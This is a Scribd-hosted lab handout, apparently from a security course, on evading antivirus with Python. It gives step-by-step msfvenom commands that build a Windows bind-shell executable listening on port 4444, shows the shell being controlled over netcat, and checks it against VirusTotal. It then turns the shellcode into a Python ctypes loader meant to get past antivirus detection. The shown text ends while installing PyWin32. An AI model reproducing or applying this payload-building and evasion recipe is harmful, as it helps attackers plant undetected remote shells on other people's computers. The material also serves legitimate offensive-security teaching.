Scribd
Upload
23 views

Lab 11

The document discusses generating malicious code using Metasploit and Python to evade antivirus detection. It covers using msfvenom to generate Windows payloads, testing them on a target system and VirusTotal, and modifying the output to be executed from Python instead of directly as an executable.

Uploaded by

Quach Hoang Nam (K16HCM)
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
23 views

Lab 11

The document discusses generating malicious code using Metasploit and Python to evade antivirus detection. It covers using msfvenom to generate Windows payloads, testing them on a target system and VirusTotal, and modifying the output to be executed from Python instead of directly as an executable.

Uploaded by

Quach Hoang Nam (K16HCM)
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 12

Proj 8: Antivirus Evasion with Python

Generating Malicious Code with Metasploit

Metasploit can generate a lot of malicious code, but it's well-known to antivirus companies and easily
recognized in its original form.

In Kali Linux, in a Terminal, execute this command:

msfvenom -l payload | more

In Kali Linux, in a Terminal, execute this command:

msfvenom -l payload | grep windows | grep shell


You see many ways to bind a shell on Windows, as shown below.
Binding a shell is the simplest form of remote control, listening on a port and allowing anyone who
connects to that port to execute command lines.

This is obviously a very insecure thing, and any sensible antivirus will stop it.

In Kali Linux, in a Terminal, execute this command:

msfvenom --payload windows/shell_bind_tcp --list-options

A summary of this exploit and its options appears, as shown below.


There are two required parameters: EXITFUNC and LPORT, and they are both set to reasonable default
values.

In Kali Linux, in a Terminal, execute these commands:

msfvenom -p windows/shell_bind_tcp -f exe -o shell.exe

ls -l shell.exe

An executable is created, as shown below

Testing the Malware on a Windows Target (Optional)

Move the "shell.exe" file to a Windows system and run it.


I double-clicked "shell.exe" to run it, and a Windows command line now shows it listening on port 4444
in netstat.

Task Manager shows the running "shell.exe" process.


I can control my Windows machine with netcat from Linux:

Testing the Malware at VirusTotal

In Kali Linux, open Firefox by clicking the blue icon at the top left of the window.

Go to

http://virustotal.com

Click the "Choose File" button.


Browse to your "shell.exe" file and double-click it.

Click the "Scan It!" button.

Your file should be detected as malicious by many of the antivirus engines. When I did it, 58/71 engines
detected it, as shown below.

Creating Malware with Python

In Kali Linux, in a Terminal, execute this command:

msfvenom -p windows/shell_bind_tcp -f c
To compile the code into a Windows executable, it needs to be in a file. That's easy to do.

In Kali Linux, in a Terminal, execute these commands:

msfvenom -p windows/shell_bind_tcp -f python -o shell.py

ls –l shell.py

This code is written in C, not in Python, so some additional lines are needed.
In Kali Linux, in a Terminal, execute this command:

nano shell.py

The code appears in the nano text editor, as shown below.

Add this line to the top of the file:

from ctypes import *

That imports the library code needed to run a C program from Python.

Remove all the comment lines.

Remove this line:

unsigned char buf[] =

Add this text to the start of the first line of hexadecimal codes:

shellcode = (

Your screen should now look like this:


In nano, use the down-arrow key to get to the end of the file.

It should look like this:

Add a closing parenthesis before the semicolon at the end of the last line, like this:
Add these lines to the end of the file:

memorywithshell = create_string_buffer(shellcode, len(shellcode))

shell = cast(memorywithshell, CFUNCTYPE(c_void_p))

shell() Your screen should now look like this:


Turning Off Internet Explorer Enhanced Security Configuration

This is an annoyance that only happens on Server versions of windows. It's intended to deter people
from surfing the Internet on a server.

In the lower right of Server Manager, in the "Security Information" section, click the "Configure IE ESC"
link, as shown below.

Click both Off buttons, as shown below. Then click OK

Installing PyWin32

On Windows, in a Web browser, go to

http://sourceforge.net/projects/pywin32/files/

On the left side, under the "Name" heading, click pywin32, as shown below.
On the next page, click "Build 218".

On the next page, click "pywin32-218.win32-py2.7.exe", as shown below.

You might also like